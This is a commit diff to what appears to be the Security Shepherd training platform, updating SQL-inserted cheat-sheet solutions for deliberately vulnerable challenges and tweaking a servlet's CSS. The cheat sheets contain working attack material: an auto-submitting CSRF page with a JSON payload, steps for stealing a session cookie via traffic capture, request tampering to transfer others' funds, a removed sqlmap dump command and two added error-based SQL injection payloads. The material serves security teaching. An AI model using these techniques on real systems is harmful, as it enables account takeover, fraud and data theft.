Updating SQL Stored Procedure Challenge Cheat Sheet

SecurityShepherdCore/database/coreSchema.sql

@@ -1500,7 +1500,7 @@ CALL cheatSheetCreate('bf847c4a8153d487d6ec36f4fca9b77749597c64', "Sign into the
 CALL cheatSheetCreate('fcc2558e0a23b8420e173cf8029876cb887408d3', "To complete this challenge, you must force another user to submit a post request which contains a JSON payload. The easiest way to achieve this is to force the user to visit a custom web page that submits the post request. This means the web page needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. It is possible to use HTML forms to submit cross domain POST requets with JSON payloads by setting the <b>enctype</b> attribute to text/plain and then forming the JSON payload around the necessary equals symbol which normally deliminates the parameter name from the parameter value. The following is an example web page that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallengeJson&quot; enctype=&quot;text/plain&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&#x27;{&quot;userId&quot;:&quot;exampleId&quot;,&quot;&#x27; value=&#x27;&quot;,&quotend&quote}&#x27;><br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallengeJson&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.");
 CALL cheatSheetCreate('6158a695f20f9286d5f12ff3f4d42678f4a9740c', "To complete this challenge, you must be able to capture the traffic of another user. The simplest way to simulate this would be to create a second user account and open it in a separate browser and open this challenge. You could then just steal the cookie straight from the browser. To demo how to solve this as expected you would actually open Wireshark and record the 2nd user opening the challenge. Filter the network capture for ip.dst == ShepherdInstanceIp, and find the unencrypted HTTP packet. Right click it and select 'Follow TCP stream'. You'll see the cookie in that dialog. <br><br> Once you have the token collected, in your original browser, click the button and intercept the request with a Proxy. Replace your cookie value with the one you collected from another user.");
 CALL cheatSheetCreate('de626470273c01388629e5a56ac6f17e2eef957b', "To complete this challenge you must first register an account. The account must have a unique name. The next step is to click the refresh balance button. Capture this request, and replay it with different account numbers until you find one with cash. If you are the first person to attempt this challenge, the account number 1 should have 10 million in it. Take note of the account number that has cash. Now fill out the 'Transfer Funds' form with any data. Capture that requets and change the receiver account number parameter to the value the sender account number parameter is currently equal to (This is your account number), change the sender account number to the identifier you noted earlier and set the transfer amount to as high as possible (must be some money left in account to work). Keep doing this untill your account has more than 5 million in it. Then open the level again or sign in / out of the account to get the result key");
-CALL cheatSheetCreate('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', 'To complete this challenge manually is extremely difficult and time consuming. It is recommended to use a tool like sqlmap to get the data required. the following sqlmap command will complete this level for you;<br><br>python.exe sqlmap.py --level 5 --risk 3 -u &quot;https://<b>environmentAddress</b>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7&quot; --data=&quot;userIdentity=test&quot; --dbms MySQL --cookie="<b>YourCookieValue</b>&quot; --dump');
+CALL cheatSheetCreate('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', "The following attack vectors will expose the result key over two queries.<br><br>Step One: <b>test' AND (SELECT 7303 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),1,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hdTL'='hdTL</b><br><br>This will return an error revealing the first part of the key in the message with <b>qxkzq1</b> added to the end for padding. remove those characters and record the rest of the key revealed. <br><br>Step Two: <b>test' AND (SELECT 9441 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),51,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ilGf'='ilGf</b><br><br>This will reveal the second part of the key, padded with <b>qkjvq</b> at the start and <b>qxkzq1</b> at the end. Remove the padding and add the rest to the previously revealed part of the result key. That is the key to solve this challenge.");
 
 COMMIT;
 

SecurityShepherdCore/src/servlets/admin/cheatSheet/GetCheat.java

@@ -79,7 +79,7 @@ public void doPost (HttpServletRequest request, HttpServletResponse response)
 						if(result != null)
 						{
 							out.write(
-									"<div id='theActualCheat' style='float: right; margin 0; width: 685px;border-color:#A878EF; border-style:dashed; background-color: #D4D4D4; padding-top:5px; padding-bottom:5px; padding-right:5px; padding-left:5px;'>" + 
+									"<div id='theActualCheat' style='float: right; margin 0; width: 685px;border-color:#A878EF; border-style:dashed; background-color: #D4D4D4; padding-top:5px; padding-bottom:5px; padding-right:5px; padding-left:5px; margin-bottom:10px;'>" + 
 									"<big style='color:#A878EF;'>" + encoder.encodeForHTML(result[0]) + " Cheat</big>" +
 									"<p>" +
 									result[1] +